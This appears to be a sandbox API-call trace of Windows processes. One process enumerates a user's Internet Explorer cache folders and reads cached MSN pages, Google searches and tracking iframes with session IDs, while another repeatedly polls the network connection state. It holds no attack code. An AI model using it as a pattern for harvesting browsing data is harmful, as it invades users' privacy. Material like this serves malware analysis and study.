FileName => FileHandle => 0x00000184 FileInformation => x\x00\x00\x00\x00\x00\x00\x00p\xc0|\x13\xe0\x91\xcf\x01p\xc0|\x13\xe0\x91\xcf\x01p\xc0|\x13\xe0\x91\xcf\x01p\xc0|\x13\xe0\x91\xcf\x01\xe3\x16\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00 \x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x18\x00J\x00A\x00M\x00_\x001\x00_\x00~\x001\x00.\x00J\x00P\x00G\x00j\x00a\x00m\x00[\x001\x00]\x00.\x00j\x00p\x00g\x00t\x00[\x003\x00\x90\x00\x00\x00\x00\x00\x00\x00@\xfb\xf6\xf3\xdf\x91\xcf\x01p\x82\xf8\xf3\xdf\x91\xcf\x01p\x82\xf8\xf3\xdf\x91\xcf\x01p\x82\xf8\xf3\xdf\x91\xcf\x01\xb3k\x01\x00\x00\x00\x00\x00\x00p\x01\x00\x00\x00\x00\x00 \x00\x00\x00.\x00\x00\x00\x00\x00\x00\x00\x16\x00J\x00Q\x00U\x00E\x00R\x00Y\x00~\x001\x00.\x00J\x00S\x00\x00\x00j\x00q\x00u\x00e\x00r\x00y\x00-\x001\x00.\x001\x000\x00.\x002\x00.\x00m\x00i\x00n\x00[\x001\x00]\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:41,368 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\A93D4QAH\mainwindow[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:41,378 | 504 | NtReadFile |
Buffer => <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
< FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:41,438 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:41,438 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\A93D4QAH\msn[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:41,448 | 504 | NtReadFile |
Buffer => <!DOCTYPE html><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">/*<![CDATA[*/if(self!=top){try{top.location.replace( FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:41,508 | 504 | NtReadFile |
Buffer => v class="br br1"><div class="img"><img src="http://col.stb01.s-msn.com/i/65/CDAB2F44A1591D2B308C20C6C15375.jpg" width="972" height="118" alt="" /></div></div></div><div id="fbtwh2" class="co2b1 cf co coa2 coc1 m3 en-us1"><input type="hidden" value="{" FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:41,568 | 504 | NtReadFile |
Buffer => psonville, MD</a><span class="loctog1"><a class="mapit opennew" href="http://www.bing.com/maps/?where1=Simpsonville, MD&FORM=MSNHPM">Get Directions</a></span></h3><div class="weahr"> </div><div class="weaheading cf"><h4><a href="http://local.msn.com/w FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:41,628 | 504 | NtReadFile |
Buffer => How a gas tax hike would slam the economy</a></div></li><li><div class="img"><a href="http://money.msn.com/saving-money-tips/post--americas-least-favorite-fast-food-restaurants"><span class="lli"><!--<img src="http://col.stb00.s-msn.com/i/DD/67E06F5349702B FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:41,678 | 504 | NtReadFile |
Buffer => s="advertisement"><div id="idShowcaseAd"><script type="text/javascript">Msn.dap("&PG=MSNREC&AP=1089",300,250,"idShowcaseAd",1,0);</script></div></div></div></div></div></div><div class="ro"><div class="ce ce1 cel w4"><div id="ca2_hml" class="co1b1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:41,748 | 504 | NtReadFile |
Buffer => 3%",configName:"divoverlayplayer",configCsid:"msnvideo"}}),$("div.pgopt1").async("scrollBind",["pageOptions",[{delay:{open:100,close:100}}]]),$("div.facebook").async("scrollBind",["socialActivityList",[{serviceName:"facebook",tabSet:"wft"}]]),$("div.twitte FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:41,748 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:41,758 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\A93D4QAH\msn[2].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:41,778 | 504 | NtReadFile |
Buffer => <!DOCTYPE html><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><body><div id="wrapper"><div id="head"><div class="pa w12"><div class="ro"><div class="ce ce1 cel w12"></div></div><div class="ro"><div class="ce ce1 cel w12" FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:41,828 | 504 | NtReadFile |
Buffer => arez-banned-from-all-soccer-for-4-months-062614">Soccer star banned for biting</a></li><li><a class="gt1-51501" href="http://news.msn.com/us/massachusetts-to-raise-minimum-wage-to-highest-of-any-us-state">State sets $11 minimum wage</a></li><li><a class="g FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:41,888 | 504 | NtReadFile |
Buffer => :15</span></li><li><h4><a href="http://movies.msn.com/movies/movie.aspx?m=2398182&shloc={0}">X-Men: Days of Future Past</a></h4><span>PG13, 2hr 10min</span><span class="time">3:20, 6:40</span></li><li><h4><a href="http://movies.msn.com/movies/movie/the FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:41,959 | 504 | NtReadFile |
Buffer => v-shows-that-axed-major-characters/feature/photo-gallery">Photo Gallery on MSN TV</a></div></li><li><div class="img"><a href="http://money.msn.com/investing/c_galleryregular.aspx?cp-documentid=253818720"><span class="lli"><!--<img src="http://col.stb00.s-m FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:42,009 | 504 | NtReadFile |
Buffer => amp; share what's on your mind</span></div></div></div><div class="ac-load none ac-updatestatus">Please wait.<br />This may take a few seconds</div><div class="ac-error none ac-head ac-errortext">Unable to show activities. Please try again later.</div></di FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:42,019 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:42,039 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\A93D4QAH\sck[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:42,039 | 504 | NtReadFile |
Buffer => <iframe src="http://www.msn.com/sck.aspx?cv=_SS%3dSID%3dB296FC53E9F3449189F55A6013617F38%3b&h=3f0c1649-bbc4-6a5c-b3fd-0f4b3e63afed" height="0" width="0" frameborder="0"></iframe> FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:42,039 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:42,039 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\A93D4QAH\search[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:42,059 | 504 | NtReadFile |
Buffer => <!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/google_favicon_128.png" itemprop="image"><title>chrome - Google Search</title>< FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:42,069 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:43:42,069 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:43:42,069 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:42,069 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:43:42,069 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:43:42,119 | 504 | NtReadFile |
Buffer => YikhBCgAf31yPYDyAEBqgQZT9BRfwM8mYVuGG7PjHlIgcKI5PxKrR5vBtIGCxCZqE4Y-d-0CSgBgAfribcJkAcD&sig=AOD64_3xefpKwW_lyMyJMYYSh_3itj0hnQ&adurl=http://clickserve.dartsearch.net/link/click%3Flid%3D43700001627736273%26ds_s_kwgid%3D58700000192879284%26ds_e_adid% FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:42,299 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:42,299 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => \x88\x00\x00\x00\x00\x00\x00\x00\xd0\xb4\xb0\x13\xe0\x91\xcf\x01\x00<\xb2\x13\xe0\x91\xcf\x01\x00<\xb2\x13\xe0\x91\xcf\x01\x00<\xb2\x13\xe0\x91\xcf\x01\x81>\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00 \x00\x00\x00$\x00\x00\x00\x00\x00\x00\x00\x18\x00T\x00I\x00M\x00E\x00M\x00A\x00~\x001\x00.\x00J\x00P\x00G\x00t\x00i\x00m\x00e\x00m\x00a\x00c\x00h\x00i\x00n\x00e\x00[\x001\x00]\x00.\x00j\x00p\x00g\x00\xf6\xf3\xdf\x91\xcf\x01\x88\x00\x00\x00\x00\x00\x00\x00@\x01\xc6\x15\xe0\x91\xcf\x01\xd0\x96\xca\x15\xe0\x91\xcf\x01\xd0\x96\xca\x15\xe0\x91\xcf\x01\xd0\x96\xca\x15\xe0\x91\xcf\x01\xf1\xb3\x01\x00\x00\x00\x00\x00\x00\xc0\x01\x00\x00\x00\x00\x00 \x00\x00\x00$\x00\x00\x00\x00\x00\x00\x00\x18\x00T\x00I\x00M\x00E\x00M\x00A\x00~\x001\x00.\x00P\x00N\x00G\x00t\x00i\x00m\x00e\x00m\x00a\x00c\x00h\x00i\x00n\x00e\x00[\x001\x00 |
SUCCESS | 0x00000000 | |
| 07:43:42,309 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\A93D4QAH\ttj[1].aspx%3Fid%3D5555&bdtop=false&bdifs=2 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:42,319 | 504 | NtReadFile |
Buffer => document.write('<a href="http://nym1.ib.adnxs.com/click?AAAAAAAAAAAAAAAAAAAAAOxRuB6F67E_AAAAAAAAAAAAAAAAAAAAAJFWfUYX8D8tD00NRcHkLXl6uKxTAAAAAAkFGADlBQAA5QUAAAIAAACN7dwAXB0EAAAAAQBVU0QAVVNEALQAlgAIogAAJ68AAgMAAQIAAIgAvRa_4wAAAAA./cnd=%216gYLQgi68-ABEI3b8wYY FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:42,319 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:42,319 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:42,319 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:42,399 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\ILCLAAS6\*.* |
SUCCESS | 0x0016e590 | |
| 07:43:42,399 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@|[\xb9\xd5I\xcd\x01\xc0}I(\xf2\x91\xcf\x01\xb0\x14\xd6\x86\xe6\x91\xcf\x01\xb0\x14\xd6\x86\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00m\x00e\x00m\x00\xb0\x00\x00\x00\x00\x00\x00\x00\xa0\xb0\xb0\xf3\xdf\x91\xcf\x01\xa0\xb0\xb0\xf3\xdf\x91\xcf\x01\xa0\xb0\xb0\xf3\xdf\x91\xcf\x01\xa0\xb0\xb0\xf3\xdf\x91\xcf\x01U\x00\x00\x00\x00\x00\x00\x00X\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00N\x00\x00\x00\x00\x00\x00\x00\x18\x000\x000\x000\x000\x000\x000\x00~\x001\x00.\x00G\x00I\x00F\x000\x000\x000\x000\x000\x000\x000\x000\x000\x001\x00_\x000\x000\x000\x000\x000\x000\x000\x000\x000\x000\x000\x000\x000\x000\x000\x000\x001\x007\x00 |
SUCCESS | 0x00000000 | |
| 07:43:42,399 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\ILCLAAS6\activityi;src=2542116;type=clien612;cat=chrom0;ord=1;num=8410154719303[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:42,399 | 504 | NtReadFile |
Buffer => <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- Google Code for PXL - Chrome - Homepage - Visit p30d -->
<script type=" FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:42,399 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:42,399 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => \x88\x00\x00\x00\x00\x00\x00\x00\xc0C\x91d\xe5\x91\xcf\x01\x10i\xb4d\xe5\x91\xcf\x01\x10i\xb4d\xe5\x91\xcf\x01\x10i\xb4d\xe5\x91\xcf\x01&\x01\x00\x00\x00\x00\x00\x00(\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00&\x00\x00\x00\x00\x00\x00\x00\x18\x00B\x00U\x00T\x00T\x00O\x00N\x00~\x004\x00.\x00P\x00N\x00G\x00b\x00u\x00t\x00t\x00o\x00n\x00-\x00r\x00i\x00g\x00h\x00t\x00[\x002\x00]\x00.\x00p\x00n\x00g\x00\xdf\x91\xcf\x01\x88\x00\x00\x00\x00\x00\x00\x00 \x99\xa0\x86\xe6\x91\xcf\x01\xb0\x14\xd6\x86\xe6\x91\xcf\x01\xb0\x14\xd6\x86\xe6\x91\xcf\x01\xb0\x14\xd6\x86\xe6\x91\xcf\x01&\x01\x00\x00\x00\x00\x00\x00(\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00&\x00\x00\x00\x00\x00\x00\x00\x18\x00B\x00U\x005\x007\x007\x002\x00~\x001\x00.\x00P\x00N\x00G\x00b\x00u\x00t\x00t\x00o\x00n\x00-\x00r\x00i\x00g\x00h\x00t\x00[\x00 |
SUCCESS | 0x00000000 | |
| 07:43:42,399 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\ILCLAAS6\f[1].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:42,439 | 504 | NtReadFile |
Buffer => (function(){var h=this,ba=function(a){var b=typeof a;if("object"==b)if(a){if(a instanceof Array)return"array";if(a instanceof Object)return b;var c=Object.prototype.toString.call(a);if("[object Window]"==c)return"object";if("[object Array]"==c||"number"==t FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:42,509 | 504 | NtReadFile |
Buffer => his,a),this.s="v"):b.Rb?(this.F="c",vd(this,a),this.s="i"):b.ca&&(this.F="l",vd(this,a),this.s="i")};var vd=function(a,b){b.clearInterval(a.W);a.W=null;a.va=!1;a.w&&wc(a.w)},od=function(a,b,c){a.I=b.setInterval(D("osd_or_lidar::adblock::iem_int",s(a.ec,a,b FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:42,539 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:42,539 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\ILCLAAS6\f[3].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:42,549 | 504 | NtReadFile |
Buffer => window.google.ac.h(["chr",[["chr\u003cb\u003eome\u003c\/b\u003e",0],["chr\u003cb\u003eis brown\u003c\/b\u003e",0],["chr\u003cb\u003eomecast\u003c\/b\u003e",0],["chr\u003cb\u003eis davis\u003c\/b\u003e",0],["chr\u003cb\u003eomecast apps\u003c\/b\u003e",0],[ FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:42,549 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:42,549 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\ILCLAAS6\f[4].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:42,559 | 504 | NtReadFile |
Buffer => window.google.ac.h(["chrom,",[["chrom \u003cb\u003efire emblem\u003c\/b\u003e",0],["\u003cb\u003echrome\u003c\/b\u003e \u003cb\u003estore\u003c\/b\u003e",0,[10],{"zb":"\u003cse\u003echrom\u003c\/se\u003e store","za":"\u003csc\u003echrome\u003c\/sc\u003e st FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:42,559 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:42,559 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\ILCLAAS6\index[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:42,579 | 504 | NtReadFile |
Buffer => <!DOCTYPE html>
<html class="no-js consumer" lang="en">
<head>
<script>
(function(e, p){
var m = location.href.match(/platform=(win8|win|mac|linux|cros)/);
e.id = (m && m[1]) ||
(p.indexOf('Windows NT 6.2') > -1 ? 'win8' : p.index FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:42,810 | 504 | NtReadFile |
Buffer => ass="image">
<div class="icon video"></div><img alt="" src=
"assets/consumer/images/tiffany/thumbs/oz.jpg">
</div>
<div class="shadow"></div>
<div class="text">
Oz Th FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:42,870 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:43:42,870 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:43:42,870 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:42,870 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:43:42,870 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:43:42,930 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:42,930 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => \x80\x00\x00\x00\x00\x00\x00\x00\xa0\x0c\xba\x99\xe3\x91\xcf\x01\x00\x1b\xbd\x99\xe3\x91\xcf\x01\x00\x1b\xbd\x99\xe3\x91\xcf\x01\x00\x1b\xbd\x99\xe3\x91\xcf\x01i\x05\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x18\x00L\x00I\x00G\x00H\x00T\x00R\x00~\x001\x00.\x00P\x00N\x00G\x00l\x00i\x00g\x00h\x00t\x00r\x00o\x00o\x00m\x00[\x001\x00]\x00.\x00p\x00n\x00g\x00p\x00\x80\x00\x00\x00\x00\x00\x00\x00\xe0\x1d\x83w\xe3\x91\xcf\x01\x80h\xc9w\xe3\x91\xcf\x01\x80h\xc9w\xe3\x91\xcf\x01\x80h\xc9w\xe3\x91\xcf\x01F\x02\x00\x00\x00\x00\x00\x00H\x02\x00\x00\x00\x00\x00\x00 \x00\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x18\x00L\x00O\x00G\x00O\x00-\x00A\x00~\x002\x00.\x00G\x00I\x00F\x00l\x00o\x00g\x00o\x00-\x00a\x00d\x00o\x00b\x00e\x00[\x002\x00]\x00.\x00g\x00i\x00f\x00 |
SUCCESS | 0x00000000 | |
| 07:43:42,950 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\ILCLAAS6\mainwindow[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:42,970 | 504 | NtReadFile |
Buffer => <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
< FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:43,030 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:43,040 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\ILCLAAS6\sck[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:43,040 | 504 | NtReadFile |
Buffer => <iframe src="http://www.msn.com/sck.aspx?cv=_SS%3dSID%3dA6159155E50F480FB86A6A6B4062A51F%3b&h=cfe7dcda-4629-fcc3-a8c2-b7758b7f4768" height="0" width="0" frameborder="0"></iframe> FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:43,050 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:43,050 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\ILCLAAS6\search[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:43,060 | 504 | NtReadFile |
Buffer => <!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/google_favicon_128.png" itemprop="image"><title>net redistributable - Google Se FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:43,130 | 504 | NtReadFile |
Buffer => m-dropdown-menu-item"><a class="am-dropdown-menu-item-text" href="/url?q=http://webcache.googleusercontent.com/search%3Fq%3Dcache:ViryUFKmlJYJ:http://www.microsoft.com/en-us/download/details.aspx%3Fid%253D17718%252Bnet%2Bredistributable%26hl%3Den%26%26ct%3 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:43,180 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:43,180 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => p\x00\x00\x00\x00\x00\x00\x00P\x87v\xf5\xdf\x91\xcf\x01P\x87v\xf5\xdf\x91\xcf\x01P\x87v\xf5\xdf\x91\xcf\x01P\x87v\xf5\xdf\x91\xcf\x01\xa7\x0c\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x16\x00T\x00H\x00_\x004\x00_\x00~\x001\x00.\x00J\x00P\x00G\x00\x00\x00t\x00h\x00[\x004\x00]\x00.\x00j\x00p\x00g\x00p\x00\x00\x00\x00\x00\x00\x00\xa09\x81\xf5\xdf\x91\xcf\x01\xa09\x81\xf5\xdf\x91\xcf\x01\xa09\x81\xf5\xdf\x91\xcf\x01\xa09\x81\xf5\xdf\x91\xcf\x01c\x0f\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x16\x00T\x00H\x00_\x005\x00_\x00~\x001\x00.\x00J\x00P\x00G\x00\x00\x00t\x00h\x00[\x005\x00]\x00.\x00j\x00p\x00g\x00p\x00\x00\x00\x00\x00\x00\x00\x90\xdd\x88\xf5\xdf\x91\xcf\x01\x90\xdd\x88\xf5\xdf\x91\xcf\x01\x90\xdd\x88\xf5\xdf\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:43:43,180 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:43,180 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:43,340 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\WEXIGKLS\*.* |
SUCCESS | 0x0016e590 | |
| 07:43:43,340 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@|[\xb9\xd5I\xcd\x01p>W(\xf2\x91\xcf\x01\xb0\x14\xd6\x86\xe6\x91\xcf\x01\xb0\x14\xd6\x86\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00[\x004\x00]\x00\xb0\x00\x00\x00\x00\x00\x00\x00@\xcf\x86\xf0\xdf\x91\xcf\x01@\xcf\x86\xf0\xdf\x91\xcf\x01@\xcf\x86\xf0\xdf\x91\xcf\x01@\xcf\x86\xf0\xdf\x91\xcf\x01U\x00\x00\x00\x00\x00\x00\x00X\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00N\x00\x00\x00\x00\x00\x00\x00\x18\x000\x000\x000\x000\x000\x000\x00~\x001\x00.\x00G\x00I\x00F\x000\x000\x000\x000\x000\x000\x000\x000\x000\x001\x00_\x000\x000\x000\x000\x000\x000\x000\x000\x000\x000\x000\x000\x000\x000\x000\x001\x005\x001\x00 |
SUCCESS | 0x00000000 | |
| 07:43:43,340 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\WEXIGKLS\activityi;src=2542116;type=clien612;cat=chromx2;ord=8175865229992[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:43,361 | 504 | NtReadFile |
Buffer => <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><div style="display:inline;">
<img height="1" width="1" style="border-style: FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:43,371 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:43,371 | 504 | NtCreateFile |
